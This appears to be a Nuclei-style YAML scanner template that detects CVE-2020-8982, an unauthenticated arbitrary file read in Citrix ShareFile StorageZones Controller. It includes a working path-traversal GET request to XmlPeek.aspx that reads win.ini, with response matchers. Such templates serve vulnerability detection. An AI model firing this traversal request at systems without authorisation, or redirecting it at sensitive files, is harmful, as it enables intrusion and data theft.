id: CVE-2020-8982 info: name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read author: dwisiswant0 severity: high description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability. reference: - https://support.citrix.com/article/CTX269106 - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8982 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-8982 cwe-id: CWE-22 tags: cve,cve2020,citrix,lfi requests: - method: GET path: - "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri" matchers-condition: and matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and - type: status status: - 200 # Enhanced by mp on 2022/06/27